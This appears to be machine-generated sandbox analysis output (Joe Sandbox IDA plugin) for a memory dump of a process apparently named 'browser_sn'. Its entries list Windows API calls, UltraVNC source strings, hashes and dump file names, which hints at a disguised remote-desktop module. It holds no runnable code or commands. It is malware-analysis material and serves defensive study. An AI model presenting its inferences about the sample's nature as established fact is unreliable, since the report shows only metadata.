                                                      • Instruction ID: 901fd0fceed1e15808e68cc51ed5eec20e07af7706bccaf26dd1e2bb8123b9f4
                                                      • Opcode Fuzzy Hash: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                      • Instruction Fuzzy Hash: F6715922A2AB4286EB25EF74E4502B8A3A4FF85B84F945535CE4E47364DF3CF455C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Delete$Object$CloseDesktopMessagePostRelease
                                                      • String ID: vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hmemdc$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to DeleteObject$vncdesktop.cpp : failed to close desktop$vncdesktopsink.cpp : ShutdownInitWindowthread
                                                      • API String ID: 4267955742-668190334
                                                      • Opcode ID: ab99dedcbfa630c798d0b2818fc7934fde54834d7a57af70546adf842ea12c7e
                                                      • Instruction ID: 942605cb3b6cd7f682c4eaa31aac7136fcc818bcdb25a02283a2878b1282406b
                                                      • Opcode Fuzzy Hash: ab99dedcbfa630c798d0b2818fc7934fde54834d7a57af70546adf842ea12c7e
                                                      • Instruction Fuzzy Hash: D871363A628A8284EB38AF71E9442FAA364FF45788F844436DA4D47758DF7CE146D320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 1145045407-2988720461
                                                      • Opcode ID: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                      • Instruction ID: 0c55e2866e31a4795f45322f14be577c52365e9e182470e8fe281febe8ae1324
                                                      • Opcode Fuzzy Hash: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                      • Instruction Fuzzy Hash: 4B615B32A286828AEB30AF31D4402E9B3A5FF45798F945535EA4D47B98DF3CF544C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateTime$CloseHandleSize$CompareMappingView
                                                      • String ID: c:\video0.dat$c:\video1.dat$videodriver.cpp : Error video.dat
                                                      • API String ID: 286203867-3102623397
                                                      • Opcode ID: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
                                                      • Instruction ID: 9bf46c108007dec11d3475d8201c3329067c3edf735ac241e36323927a0af34e
                                                      • Opcode Fuzzy Hash: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
                                                      • Instruction Fuzzy Hash: 4B518F22A2964245EA719B35A5146B9F3A2BF85BF4FC41335DA3D03BE4DE3CF449C620
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
                                                      • String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
                                                      • API String ID: 421869683-3362258117
                                                      • Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                      • Instruction ID: 54b201ee3819efe3603267e7049cf86deeacee7e331c9df60c30fe6a075927d7
                                                      • Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                      • Instruction Fuzzy Hash: 27518432A28B4185E764EF31E8442A9B7B4FF85750F845235EA9D43BA8DF3CE515C710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Object$Select$CreateDelete$BrushClipCompatibleEmptyFileModuleNameRectSolidStretch
                                                      • String ID: $!
                                                      • API String ID: 844750580-2056089098
                                                      • Opcode ID: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
                                                      • Instruction ID: 61a1c67abaf146b1807d265b67cdbcf4fc2654bb7fc7bb4863d38741aa38a8ab
                                                      • Opcode Fuzzy Hash: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
                                                      • Instruction Fuzzy Hash: 1C414D3562978286EA70AB31A8143AAF3A0FF89B94F845134DD5E47B94DF3CF4449B14
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseQueryValue$Openlstrlenmalloc
                                                      • String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
                                                      • API String ID: 1137168859-3840687832
                                                      • Opcode ID: 32626daec1fe8a25ead540a82463a4f86ecf2e9460f47b6cecf95af5a5135861
                                                      • Instruction ID: 748a31b4678e7fc1aa3d1cd6c974b56942ebe36cdfcef6a46a676ff715dee58e
                                                      • Opcode Fuzzy Hash: 32626daec1fe8a25ead540a82463a4f86ecf2e9460f47b6cecf95af5a5135861
                                                      • Instruction Fuzzy Hash: 1A415D31A2C74381EA64AB31B4402B9F7A0EF8ABC4F845131E98D42B69DF2CF555CB20
                                                      APIs
                                                      Strings
                                                      • x, xrefs: 00007FF790C60A25
                                                      • UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF790C60AAC
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
                                                      • String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
                                                      • API String ID: 3190128964-2508378015
                                                      • Opcode ID: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                      • Instruction ID: 4f3dd2db097c2ee9e91c139bdd1de0ade1f89655668bc2c86736e2b611b853b5
                                                      • Opcode Fuzzy Hash: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                      • Instruction Fuzzy Hash: 22313235618A8696E710AF75E4445AAF3B0FF89B98F845032DE4E47718DF7CE445CB20
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CombineCreateDeleteObjectRectfree$ErrorFreeHeapLast_errnomalloc
                                                      • String ID: vistahook.cpp : REct %i %i %i %i
                                                      • API String ID: 1305454473-3781348997
                                                      • Opcode ID: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
                                                      • Instruction ID: ed23f897ccb745535c7d854dcb834f6e7cffa18963885dbfe7f62758fe2c5d7b
                                                      • Opcode Fuzzy Hash: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
                                                      • Instruction Fuzzy Hash: CCE13676B246918AE720DF79D4846ACB7F1FB49B88F804036DE4E93B58DB38E454CB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
                                                      • String ID: schook$w8hook
                                                      • API String ID: 2828954817-2864610768
                                                      • Opcode ID: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
                                                      • Instruction ID: 5f4d4b23be1e479879ee5e462cd83677a1928b10c8278df63a948bc4e18b4dbf
                                                      • Opcode Fuzzy Hash: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
                                                      • Instruction Fuzzy Hash: 90B10936A18B8686EA74AB31E4441EAB7A0FF45B84F844536DB9E43751DF38F485C321
                                                      APIs
                                                      Strings
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF790C45F61
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF790C45FAF
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF790C46160
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF790C45FC8
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF790C45F1B
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF790C45FF6
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                      • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                      • API String ID: 181403729-1081969236
                                                      • Opcode ID: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
                                                      • Instruction ID: 5c1917d371802b1ca96187a30508f2fe67d6fd4cbd1e44aa804150716a2d30f2
                                                      • Opcode Fuzzy Hash: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
                                                      • Instruction Fuzzy Hash: 8B610462A2968241E734EB35A4113F9B7A1FF56744FC45036EA8E4B395EE3CF14AC360
                                                      APIs
                                                      Strings
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF790C455BD
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF790C45603
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF790C4577E
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF790C4561C
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF790C4557A
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF790C4564A
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                      • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                      • API String ID: 181403729-1081969236
                                                      • Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                      • Instruction ID: d23492d11392e94cfc9c9ca560a92975a11fbbd1a30fdc29b56872a660a4e2e0
                                                      • Opcode Fuzzy Hash: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                      • Instruction Fuzzy Hash: 155109A2B3958241E729EB35A4502F8B3A1FF46744FC45039E94E87791DE3CF549C760
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
